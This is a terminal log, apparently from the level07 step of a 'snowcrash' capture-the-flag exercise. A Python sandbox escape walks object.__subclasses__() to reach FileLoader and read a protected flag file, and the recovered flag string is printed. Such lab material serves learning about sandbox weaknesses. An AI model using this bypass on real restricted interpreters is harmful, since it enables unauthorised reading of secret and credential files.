level07@snowcrash:~$ print([c.__name__ for c in "".__class__.__base__.__subclasses__()])
['type', 'async_generator', 'bytearray_iterator', 'bytearray', 'bytes_iterator', 'bytes',
'builtin_function_or_method', 'callable_iterator', 'PyCapsule', 'cell', 'classmethod_descriptor',
'classmethod', 'code', 'complex', 'Token', 'ContextVar', 'Context', 'coroutine', 'dict_items',
'dict_itemiterator', 'dict_keyiterator', 'dict_valueiterator', 'dict_keys', 'mappingproxy', 'dict_reverseitemiterator', 'dict_reversekeyiterator', 'dict_reversevalueiterator', 'dict_values', 'dict', 'ellipsis', 'enumerate', 'filter', 'float', 'frame', 'frozenset', 'function', 'generator', 'getset_descriptor', 'instancemethod', 'list_iterator', 'list_reverseiterator', 'list', 'longrange_iterator', 'int', 'map', 'member_descriptor', 'memoryview', 'method_descriptor', 'method', 'moduledef', 'module', 'odict_iterator', 'PickleBuffer', 'property', 'range_iterator', 'range', 'reversed', 'symtable entry', 'iterator', 'set_iterator', 'set', 'slice', 'staticmethod', 'stderrprinter', 'super', 'traceback', 'tuple_iterator', 'tuple', 'str_iterator', 'str', 'wrapper_descriptor', 'zip', 'GenericAlias', 'anext_awaitable', 'async_generator_asend', 'async_generator_athrow', 'async_generator_wrapped_value', '_buffer_wrapper', 'MISSING', 'coroutine_wrapper', 'generic_alias_iterator', 'items', 'keys', 'values', 'hamt_array_node', 'hamt_bitmap_node', 'hamt_collision_node', 'hamt', 'legacy_event_handler', 'InterpreterID', 'line_iterator', 'managedbuffer', 'memory_iterator', 'method-wrapper', 'SimpleNamespace', 'NoneType', 'NotImplementedType', 'positions_iterator', 'str_ascii_iterator', 'UnionType', 'CallableProxyType', 'ProxyType', 'ReferenceType', 'TypeAliasType', 'Generic', 'TypeVar', 'TypeVarTuple', 'ParamSpec', 'ParamSpecArgs', 'ParamSpecKwargs', 'EncodingMap', 'fieldnameiterator', 'formatteriterator', 'BaseException', '_WeakValueDictionary', '_BlockingOnManager', '_ModuleLock', '_DummyModuleLock', '_ModuleLockManager', 'ModuleSpec', 'BuiltinImporter', 'FrozenImporter', '_ImportLockContext', 'lock', 'RLock', '_localdummy', '_local', 'IncrementalNewlineDecoder', '_BytesIOBuffer', '_IOBase', 'ScandirIterator', 'DirEntry', 'WindowsRegistryFinder', '_LoaderBasics', 'FileLoader', '_NamespacePath', 'NamespaceLoader', 'PathFinder', 'FileFinder', 'Codec', 'IncrementalEncoder', 'IncrementalDecoder', 'StreamReaderWriter', 'StreamRecoder', '_abc_data', 'ABC', 'Hashable', 'Awaitable', 'AsyncIterable', 'Iterable', 'Sized', 'Container', 'Buffer', 'Callable', 'ALLOW_MISSING', '_wrap_close', 
'Quitter', '_Printer', '_Helper', '_TrivialRe', 'DistutilsMetaFinder', 'shim', 'DynamicClassAttribute', '_GeneratorWrapper', 'WarningMessage', 'catch_warnings', 'Loader', 'accumulate', 'batched', 'chain', 'combinations', 'compress', 'count', 'combinations_with_replacement', 'cycle', 'dropwhile', 'filterfalse', 'groupby', '_grouper', 'islice', 'pairwise', 'permutations', 'product', 'repeat', 'starmap', 'takewhile', '_tee', '_tee_dataobject', 'zip_longest', 'attrgetter', 'itemgetter', 'methodcaller', 'Repr', 'deque', '_deque_iterator', '_deque_reverse_iterator', '_tuplegetter', '_Link', 'partial', '_lru_cache_wrapper', 'KeyWrapper', '_lru_list_elem', 'partialmethod', 'singledispatchmethod', 'cached_property', '_IterationGuard', 'WeakSet', '_RLock', 'Condition', 'Semaphore', 'Event', 'Barrier', 'Thread', '_incompatible_extension_module_restrictions', 'nonmember', 'member', '_not_given', '_auto_null', 'auto', '_proto_member', 'Enum', 'verify', 'Pattern', 'Match', 'SRE_Scanner', 'SRE_Template', 'State', 'SubPattern', 'Tokenizer', 'Scanner', 'HASH', 'HMAC', 'blake2b', 'blake2s', 'Struct', 'unpack_iterator', '_NodeBase', '_RegistryMixin', 'AST']

--- find the FileLoader index
"".__class__.__mro__[1].__subclasses__()[134]('catch', '/home/flag07/.flag').get_data('/home/flag07/.flag')
level07@snowcrash:~$ "".__class__.__mro__[1].__subclasses__()[134]('catch', '/home/flag07/.flag').get_data('/home/flag07/.flag')
b'fiumuikeil8rung8ahcuiperb\n'
